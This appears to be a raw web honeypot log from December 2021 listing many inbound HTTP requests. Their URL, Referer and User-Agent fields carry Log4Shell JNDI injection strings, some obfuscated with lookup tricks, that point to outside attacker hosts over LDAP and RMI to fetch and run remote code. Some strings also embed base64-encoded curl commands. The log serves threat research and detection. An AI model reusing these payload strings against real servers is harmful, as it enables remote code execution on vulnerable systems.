    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-21 161.97.170.219
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-21 161.97.170.219
    URL: GET /
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-21 161.97.170.219
    URL: GET /
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-21 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-21 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-21 51.195.192.126
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://sshd-honeypot1.rr.sabrajndi.site}

2021-12-21 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-21 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-21 148.202.167.75
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 148.202.167.75
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 206.189.234.101
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBin
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 206.189.234.101
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBin
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 206.189.234.101
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 206.189.234.101
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 206.189.234.101
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-21 206.189.234.101
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 206.189.234.101
    URL: GET /
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 206.189.234.101
    URL: GET /
    Referer: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 207.244.245.138
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Bupper%3An%7D%24%7Blower%3Ad%7D%24%7Bupper%3Ai%7D%3A%24%7
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}

2021-12-21 207.180.254.177
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent:

2021-12-21 207.180.254.177
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-21 207.180.254.177
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 207.180.254.177
    URL: GET /
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 207.244.245.138
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}

2021-12-21 207.244.245.138
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 207.244.245.138
    URL: GET /
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-21 198.58.104.203
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-21 198.58.104.203
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-21 198.58.104.203
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-21 198.58.104.203
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 168.197.250.14
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${jndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 168.197.250.14
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${jndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 168.197.250.14
    URL: GET /
    Referer: ${jndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${jndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 168.197.250.14
    URL: GET /
    Referer: ${jndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${jndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 168.197.250.14
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 168.197.250.14
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 168.197.250.14
    URL: GET /
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 168.197.250.14
    URL: GET /
    Referer: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 82.165.65.107
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 82.165.65.107
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 82.165.65.107
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 82.165.65.107
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBin
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-20 82.165.65.107
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-20 82.165.65.107
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 82.165.65.107
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBin
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-20 82.165.65.107
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-20 173.212.201.58
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 173.212.201.58
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 173.212.201.58
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 173.212.201.58
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 173.212.201.58
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 173.212.201.58
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 173.212.201.58
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 173.212.201.58
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 68.183.82.33
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F188.166.57
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 68.183.82.33
    URL: GET /
    Referer: ${${lower:${lower:jnd}}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 68.183.82.33
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 68.183.82.33
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 195.154.43.159
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 195.154.43.159
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 195.154.43.159
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 195.154.43.159
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 195.154.43.159
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 195.154.43.159
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 195.154.43.159
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 195.154.43.159
    URL: GET /
    Referer: ${jndi:ldap://188.166.57.35:1389/Binary}
    User Agent: ${jndi:ldap://188.166.57.35:1389/Binary}

2021-12-20 185.3.94.121
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F188.166.57
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${$lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 185.3.94.121
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 185.3.94.121
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 185.3.94.121
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 165.22.230.183
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 165.22.230.183
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 165.22.230.183
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 165.22.230.183
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 165.22.230.183
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-20 165.22.230.183
    URL: GET /
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-20 165.22.230.183
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-20 165.22.230.183
    URL: GET /
    Referer: ${jndi:rmi://188.166.57.35:1389/Binary}
    User Agent: ${jndi:rmi://188.166.57.35:1389/Binary}

2021-12-20 147.135.255.139
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-20 147.135.255.139
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-20 147.135.255.139
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://167.99.115.242:1389/Binary}
    User Agent: ${jndi:ldap://167.99.115.242:1389/Binary}

2021-12-20 147.135.255.139
    URL: GET /
    Referer: ${jndi:ldap://167.99.115.242:1389/Binary}
    User Agent: ${jndi:ldap://167.99.115.242:1389/Binary}

2021-12-20 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-20 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-20 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-20 45.224.181.2
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-20 45.224.181.2
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://167.99.115.242:1389/Binary}

2021-12-20 45.224.181.2
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Bupper%3An%7D%24%7Blower%3Ad%7D%24%7Bupper%3Ai%7D%3A%24%7
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}

2021-12-20 45.224.181.2
    URL: GET /
    Referer: ${${lower:j}${upper:n${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}

2021-12-20 122.155.196.149
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${jndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 122.155.196.149
    URL: GET /
    Referer: ${jndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${jndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 122.155.196.149
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 122.155.196.149
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 122.155.196.149
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${jndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 122.155.196.149
    URL: GET /
    Referer: ${jndi:rmi://167.99.115.242:1389/Binary}
    User Agent: ${jndi:rmi://167.99.115.242:1389/Binary}

2021-12-20 122.155.196.149
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 122.155.196.149
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary}

2021-12-20 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-20 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-20 167.172.177.71
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBin
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-20 167.172.177.71
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary}

2021-12-20 167.172.177.71
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Bupper%3An%7D%24%7Blower%3Ad%7D%24%7Bupper%3Ai%7D%3A%24%7
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}

2021-12-20 167.172.177.71
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary}

2021-12-20 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-20 162.241.92.70
